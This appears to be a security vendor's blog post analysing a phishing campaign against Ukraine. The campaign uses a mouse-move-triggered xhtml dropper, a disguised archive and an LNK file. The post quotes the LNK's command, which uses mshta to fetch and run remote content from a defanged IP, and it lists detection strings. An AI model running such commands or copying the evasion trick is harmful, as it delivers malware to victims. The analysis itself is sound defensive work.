Attackers and defenders are in a never ending cat-and-mouse game with vulnerabilities and countermeasures. Whether it be captchas, IP filtering, or password protection, threat actors are constantly looking for ways to aggravate detection – and irritate detection engineers. This Russia-nexus threat actor, targeting Ukraine, is no different.

TLDR: Be on the lookout for attacks that require you to jiggle the mouse before it will execute.

A customer recently asked about a curious file:

Figure 1: Original sample

With the ongoing invasion of Ukraine by their neighbor, threat analysts have their antennae tuned towards Russia-nexus threats, and the relative (lack of) prevalence of this stood out:

Figure 2: xhtml file, with the middle trimmed for visibility

Right away, one can notice that the actor will replace “*” with ““, but only after “onmousemove” is triggered. When executing this in a sandbox environment, make sure you’ve implemented something like a mouse jiggler. This file, and all files referenced, are available in our github at the end of the post.

After decoding the above code, one can see what appears initially to be a “rar” being written

Figure 3: decoded blob from Figure 2, with trimmed base64 for formatting

Despite the rar header and extension, this writes a 7z. Additionally, there is a remote 1px image fetched, likely to track execution. Noteworthy for signature creators – this attacker is interested in you, even if you’re still running Windows CE! (this is likely a copy/paste artifact from another source). Another oddity is the usage of http instead of https. The past decade of broad technology improvements have made https nearly as easy to deploy as http, so the lack of interest in getting a free conforming cert, on a server you control, is unusual.

Figure 4: Dropped “rar” and compressed LNK

The lnk leverages mshta to execute remote content, C:\Windows\System32\mshta.exe http://185.225.19[.]69/gm/decency.zip and was created by the hostname desktop-u5gf4op

Figure 5: Chain of execution

Leveraging the host artifact in the LNK, and the content match color:#fff" onmousemove=, we can leverage CARA to surface other interesting samples.

Figure 6: CARA helping find similar samples (coming next month, early beta available)

While researching this threat, we came across this tweet, which is describing the same campaign, but with attribution that does not match ours. One of the other associated samples was seen as an attachment in an email, and as expected, the phish targeted Ukraine.

Figure 7: Phishing email from their campaign, sourced from VirusTotal

Below we show the HTML files discovered by CARA, and their associated artifacts:

Lastly, below we show the dropped rar/zip/7zip, and their associated next stages:

Figure 10: Other validated vendor names for this actor

Our github provides a download to both the raw samples mentioned in the blog, as well as the indicators mentioned.

Acknowledgements

The authors would like to thank the reviewers, as well as peer vendors, for their comments and corrections. Please get in touch at if you have corrections, or would like to collaborate on research.